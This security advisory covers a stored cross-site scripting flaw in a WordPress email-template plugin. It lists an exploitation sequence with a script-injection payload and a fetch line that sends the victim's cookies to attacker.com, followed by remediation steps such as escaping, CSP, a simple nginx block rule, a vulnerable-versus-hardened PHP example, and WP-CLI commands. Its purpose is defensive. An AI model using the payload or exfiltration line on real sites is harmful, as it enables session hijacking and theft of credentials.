WordPress, Stored Cross-Site Scripting (XSS), CVE-2025-28875 (Medium)

How the CVE Works:

CVE-2025-28875 is a Stored XSS vulnerability in the BP Email Assign Templates plugin (versions up to 1.6) for WordPress. The flaw arises from improper sanitization of user-supplied input during web page generation: attacker-controlled markup placed in email template fields is stored without sanitization and rendered unescaped. Injected JavaScript therefore executes whenever an admin or user views the affected template in the dashboard. Since the payload is stored server-side, the attack is persistent and can lead to session hijacking, phishing, or privilege escalation.

DailyCVE Form:

Platform: WordPress
Version: ≤ 1.6
Vulnerability: Stored XSS
Severity: Medium
Date: 04/09/2025

What Undercode Says:

Exploitation:

1. Payload Injection:

<script>alert(document.cookie)</script>

Inserted into email template fields.

2. Trigger Execution:

When an admin loads the template, the script executes in their browser.

3. Exfiltrate Data:

fetch('https://attacker.com/steal?data='+btoa(document.cookie))

Protection:

1. Update Plugin:

wp plugin update bp-email-assign-templates

2. Input Sanitization:

echo esc_html($_POST['template_content']);

3. Content Security Policy (CSP):

Content-Security-Policy: default-src 'self'; script-src 'self'

Do not add 'unsafe-inline' to script-src: it re-enables exactly the inline <script> payload this vulnerability injects. The WordPress dashboard itself relies on inline scripts, so test the header on wp-admin pages (or deploy it as Content-Security-Policy-Report-Only first) before enforcing it.

4. WAF Rules:

location ~ \.php$ {
    # Naive signature match on the request URI only; stored-XSS payloads arrive in POST bodies,
    # which plain nginx does not inspect, so this is a stopgap rather than a substitute for a real WAF module.
    if ($request_uri ~* "<script") { return 403; }
}

5. Manual Patch:

// Before: raw echo, stored <script> runs in the viewer's browser
echo $template_content;
// After: wp_kses_post() keeps post-safe HTML and strips <script>, on* handlers and javascript: URLs
echo wp_kses_post($template_content);
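As an added illustration (not the plugin's own code), a hypothetical save-and-render pair for a template option, showing the raw-echo pattern the advisory describes next to a hardened version that applies a capability check, a nonce check and WordPress' own escaping APIs; the bpeat_* function names, the option key and the form field name are assumptions.

```php
<?php
// Added illustration, not the plugin's code. The bpeat_* names, the option key
// and the form field 'template_content' are assumptions made for this example.

// --- Vulnerable pattern: stores and echoes raw input -------------------------
function bpeat_save_template_vulnerable() {
    // No capability or nonce check, no sanitization: any submitted markup,
    // including <script>, is persisted as-is.
    update_option( 'bpeat_template_content', $_POST['template_content'] );
}

function bpeat_render_template_vulnerable() {
    // Raw echo: a stored <script> runs in the browser of whoever opens the page.
    echo get_option( 'bpeat_template_content' );
}

// --- Hardened pattern --------------------------------------------------------
function bpeat_save_template_hardened() {
    // Only users allowed to manage options may save, and the request must
    // carry the nonce printed by wp_nonce_field( 'bpeat_save_template' ).
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.' );
    }
    check_admin_referer( 'bpeat_save_template' );

    // wp_kses_post() keeps the HTML a post body may contain (p, a, strong, ...)
    // and strips <script>, on* event handlers and javascript: URLs.
    $content = wp_kses_post( wp_unslash( $_POST['template_content'] ?? '' ) );
    update_option( 'bpeat_template_content', $content );
}

function bpeat_render_template_hardened() {
    $content = get_option( 'bpeat_template_content', '' );

    // Rich-text preview: filter again on output, so a value written by an
    // older, unsanitized version of the code cannot execute either.
    echo wp_kses_post( $content );

    // Same value inside the editor's textarea: here the markup should be shown
    // literally, so HTML-escape it instead of filtering it.
    echo '<textarea name="template_content">' . esc_textarea( $content ) . '</textarea>';
}
```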

6. Log Monitoring:

tail -f /var/log/nginx/access.log | grep -i "script"

7. Disable Plugin (Temporary):

wp plugin deactivate bp-email-assign-templates

8. Audit Users:

wp user list --role=administrator

9. Backup Before Fix:

wp db export backup_cve202528875.sql

10. Verify Fix:

wp plugin get bp-email-assign-templates --field=version

References:

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-28875